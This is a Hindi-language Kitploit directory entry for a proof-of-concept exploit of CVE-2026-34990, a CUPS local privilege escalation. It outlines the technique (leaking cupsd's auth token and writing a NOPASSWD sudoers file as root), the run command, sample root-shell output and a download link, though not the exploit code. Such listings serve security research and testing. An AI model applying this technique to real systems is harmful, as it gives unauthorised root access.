Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/predyy/cve-2026-34990
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणसुरक्षा वर्चुअलाइजेशनपेनिट्रेशन टेस्टिंग
GitHubpredyy/cve-2026-34990

CVE-2026-34990

CVE-2026-34990 के लिए न्यूनतम PoC: CUPS <= 2.4.16 में स्थानीय विशेषाधिकार वृद्धि जो cupsd के Local auth टोकन को लीक करती है और root के रूप में NOPASSWD sudoers फ़्रैगमेंट लिखती है।

रिपॉजिटरी देखें
293 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-34990 - CUPS स्थानीय प्रिवएस्क

CUPS <= 2.4.16 के विरुद्ध स्थानीय विशेषाधिकार वृद्धि जो root के रूप में चल रहा है। cupsd के Local auth टोकन को लीक करता है, फिर file:// प्रिंट क्यू के माध्यम से root के रूप में एक NOPASSWD sudoers फ्रैगमेंट लिखता है।

उपयोग

python3 poc.py

सफल होने पर:

[*] CVE-2026-34990 | user=ctfplayer | cupsd=127.0.0.1:631
[*] coercing cupsd - rogue server ...
[+] captured token: f4a8...c31b
[*] writing sudoers ...
[+] wrote /etc/sudoers.d/ctfplayer-pwn
[+] ROOT: uid=0(root) gid=0(root) groups=0(root)
[*] run: sudo -i

फिर:

sudo -i

अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। इस एक्सप्लॉइट के किसी भी दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं है। किसी भी भेद्यता का परीक्षण या शोषण करने से पहले हमेशा सुनिश्चित करें कि आपके पास अनुमति है!

टूल डाउनलोड करें